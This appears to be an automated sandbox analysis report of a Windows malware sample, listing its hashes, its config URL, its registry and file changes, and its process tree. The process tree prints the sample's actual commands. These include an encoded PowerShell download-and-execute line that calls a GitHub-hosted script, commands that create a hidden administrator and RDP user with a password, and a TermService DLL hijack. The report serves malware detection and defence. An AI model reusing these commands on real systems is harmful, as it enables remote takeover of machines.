Analysis
-
max time kernel
132s -
max time network
133s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-11-2020 17:43
Static task
static1
Behavioral task
behavioral1
Sample
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
Resource
win10v20201028
General
-
Target
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
-
Size
3.4MB
-
MD5
af944f00c218cc525ef7e56f5d634cdf
-
SHA1
532a7870f610b86ef3c1eb3f10b60a9da6152bcb
-
SHA256
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2
-
SHA512
62b68e3651ae7a0222bc3a16442994b9c6d6505965e7b081bac168659b6eb97bbbb0cc5db260e65f4185017de62a5dc16c37347e447467db75ae062022533014
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 15 1260 powershell.exe 17 1260 powershell.exe 18 1260 powershell.exe 19 1260 powershell.exe 21 1260 powershell.exe 23 1260 powershell.exe 25 1260 powershell.exe 27 1260 powershell.exe 29 1260 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 3892 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1056 1056 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zarfdl2k.zmy.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wbszy3ys.lh4.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3C7E.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3C9E.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3CEE.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3BE1.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3CDE.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 3892 powershell.exe 3892 powershell.exe 3892 powershell.exe 3892 powershell.exe 3892 powershell.exe 3892 powershell.exe 1260 powershell.exe 1260 powershell.exe 1260 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3892 powershell.exe Token: SeIncreaseQuotaPrivilege 3892 powershell.exe Token: SeSecurityPrivilege 3892 powershell.exe Token: SeTakeOwnershipPrivilege 3892 powershell.exe Token: SeLoadDriverPrivilege 3892 powershell.exe Token: SeSystemProfilePrivilege 3892 powershell.exe Token: SeSystemtimePrivilege 3892 powershell.exe Token: SeProfSingleProcessPrivilege 3892 powershell.exe Token: SeIncBasePriorityPrivilege 3892 powershell.exe Token: SeCreatePagefilePrivilege 3892 powershell.exe Token: SeBackupPrivilege 3892 powershell.exe Token: SeRestorePrivilege 3892 powershell.exe Token: SeShutdownPrivilege 3892 powershell.exe Token: SeDebugPrivilege 3892 powershell.exe Token: SeSystemEnvironmentPrivilege 3892 powershell.exe Token: SeRemoteShutdownPrivilege 3892 powershell.exe Token: SeUndockPrivilege 3892 powershell.exe Token: SeManageVolumePrivilege 3892 powershell.exe Token: 33 3892 powershell.exe Token: 34 3892 powershell.exe Token: 35 3892 powershell.exe Token: 36 3892 powershell.exe Token: SeIncreaseQuotaPrivilege 3892 powershell.exe Token: SeSecurityPrivilege 3892 powershell.exe Token: SeTakeOwnershipPrivilege 3892 powershell.exe Token: SeLoadDriverPrivilege 3892 powershell.exe Token: SeSystemProfilePrivilege 3892 powershell.exe Token: SeSystemtimePrivilege 3892 powershell.exe Token: SeProfSingleProcessPrivilege 3892 powershell.exe Token: SeIncBasePriorityPrivilege 3892 powershell.exe Token: SeCreatePagefilePrivilege 3892 powershell.exe Token: SeBackupPrivilege 3892 powershell.exe Token: SeRestorePrivilege 3892 powershell.exe Token: SeShutdownPrivilege 3892 powershell.exe Token: SeDebugPrivilege 3892 powershell.exe Token: SeSystemEnvironmentPrivilege 3892 powershell.exe Token: SeRemoteShutdownPrivilege 3892 powershell.exe Token: SeUndockPrivilege 3892 powershell.exe Token: SeManageVolumePrivilege 3892 powershell.exe Token: 33 3892 powershell.exe Token: 34 3892 powershell.exe Token: 35 3892 powershell.exe Token: 36 3892 powershell.exe Token: SeIncreaseQuotaPrivilege 3892 powershell.exe Token: SeSecurityPrivilege 3892 powershell.exe Token: SeTakeOwnershipPrivilege 3892 powershell.exe Token: SeLoadDriverPrivilege 3892 powershell.exe Token: SeSystemProfilePrivilege 3892 powershell.exe Token: SeSystemtimePrivilege 3892 powershell.exe Token: SeProfSingleProcessPrivilege 3892 powershell.exe Token: SeIncBasePriorityPrivilege 3892 powershell.exe Token: SeCreatePagefilePrivilege 3892 powershell.exe Token: SeBackupPrivilege 3892 powershell.exe Token: SeRestorePrivilege 3892 powershell.exe Token: SeShutdownPrivilege 3892 powershell.exe Token: SeDebugPrivilege 3892 powershell.exe Token: SeSystemEnvironmentPrivilege 3892 powershell.exe Token: SeRemoteShutdownPrivilege 3892 powershell.exe Token: SeUndockPrivilege 3892 powershell.exe Token: SeManageVolumePrivilege 3892 powershell.exe Token: 33 3892 powershell.exe Token: 34 3892 powershell.exe Token: 35 3892 powershell.exe Token: 36 3892 powershell.exe -
Suspicious use of WriteProcessMemory 68 IoCs
Processes:
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.exedescription pid process target process PID 1400 wrote to memory of 3892 1400 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe powershell.exe PID 1400 wrote to memory of 3892 1400 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe powershell.exe PID 3892 wrote to memory of 744 3892 powershell.exe csc.exe PID 3892 wrote to memory of 744 3892 powershell.exe csc.exe PID 744 wrote to memory of 2228 744 csc.exe cvtres.exe PID 744 wrote to memory of 2228 744 csc.exe cvtres.exe PID 3892 wrote to memory of 188 3892 powershell.exe reg.exe PID 3892 wrote to memory of 188 3892 powershell.exe reg.exe PID 3892 wrote to memory of 3932 3892 powershell.exe reg.exe PID 3892 wrote to memory of 3932 3892 powershell.exe reg.exe PID 3892 wrote to memory of 3456 3892 powershell.exe reg.exe PID 3892 wrote to memory of 3456 3892 powershell.exe reg.exe PID 3892 wrote to memory of 3384 3892 powershell.exe net.exe PID 3892 wrote to memory of 3384 3892 powershell.exe net.exe PID 3384 wrote to memory of 2932 3384 net.exe net1.exe PID 3384 wrote to memory of 2932 3384 net.exe net1.exe PID 3892 wrote to memory of 2260 3892 powershell.exe cmd.exe PID 3892 wrote to memory of 2260 3892 powershell.exe cmd.exe PID 2260 wrote to memory of 2756 2260 cmd.exe cmd.exe PID 2260 wrote to memory of 2756 2260 cmd.exe cmd.exe PID 2756 wrote to memory of 2228 2756 cmd.exe net.exe PID 2756 wrote to memory of 2228 2756 cmd.exe net.exe PID 2228 wrote to memory of 744 2228 net.exe net1.exe PID 2228 wrote to memory of 744 2228 net.exe net1.exe PID 3892 wrote to memory of 2144 3892 powershell.exe cmd.exe PID 3892 wrote to memory of 2144 3892 powershell.exe cmd.exe PID 2144 wrote to memory of 1908 2144 cmd.exe cmd.exe PID 2144 wrote to memory of 1908 2144 cmd.exe cmd.exe PID 1908 wrote to memory of 2792 1908 cmd.exe net.exe PID 1908 wrote to memory of 2792 1908 cmd.exe net.exe PID 2792 wrote to memory of 360 2792 net.exe net1.exe PID 2792 wrote to memory of 360 2792 net.exe net1.exe PID 3828 wrote to memory of 3852 3828 cmd.exe net.exe PID 3828 wrote to memory of 3852 3828 cmd.exe net.exe PID 3852 wrote to memory of 68 3852 net.exe net1.exe PID 3852 wrote to memory of 68 3852 net.exe net1.exe PID 1220 wrote to memory of 2668 1220 cmd.exe net.exe PID 1220 wrote to memory of 2668 1220 cmd.exe net.exe PID 2668 wrote to memory of 3264 2668 net.exe net1.exe PID 2668 wrote to memory of 3264 2668 net.exe net1.exe PID 2320 wrote to memory of 3384 2320 cmd.exe net.exe PID 2320 wrote to memory of 3384 2320 cmd.exe net.exe PID 3384 wrote to memory of 2168 3384 net.exe net1.exe PID 3384 wrote to memory of 2168 3384 net.exe net1.exe PID 2212 wrote to memory of 1264 2212 cmd.exe net.exe PID 2212 wrote to memory of 1264 2212 cmd.exe net.exe PID 1264 wrote to memory of 3996 1264 net.exe net1.exe PID 1264 wrote to memory of 3996 1264 net.exe net1.exe PID 2724 wrote to memory of 2692 2724 cmd.exe net.exe PID 2724 wrote to memory of 2692 2724 cmd.exe net.exe PID 2692 wrote to memory of 2432 2692 net.exe net1.exe PID 2692 wrote to memory of 2432 2692 net.exe net1.exe PID 3456 wrote to memory of 3264 3456 cmd.exe net.exe PID 3456 wrote to memory of 3264 3456 cmd.exe net.exe PID 3264 wrote to memory of 1404 3264 net.exe net1.exe PID 3264 wrote to memory of 1404 3264 net.exe net1.exe PID 716 wrote to memory of 580 716 cmd.exe WMIC.exe PID 716 wrote to memory of 580 716 cmd.exe WMIC.exe PID 3892 wrote to memory of 2212 3892 powershell.exe cmd.exe PID 3892 wrote to memory of 2212 3892 powershell.exe cmd.exe PID 1784 wrote to memory of 3932 1784 cmd.exe WMIC.exe PID 1784 wrote to memory of 3932 1784 cmd.exe WMIC.exe PID 3892 wrote to memory of 2660 3892 powershell.exe cmd.exe PID 3892 wrote to memory of 2660 3892 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe"C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE08.tmp" "c:\Users\Admin\AppData\Local\Temp\x4qns4nh\CSC2BC06D68D97C49B4A01877BFEAB6C4F7.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin qVojyFfh /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin qVojyFfh /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin qVojyFfh /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin qVojyFfh1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin qVojyFfh2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin qVojyFfh3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
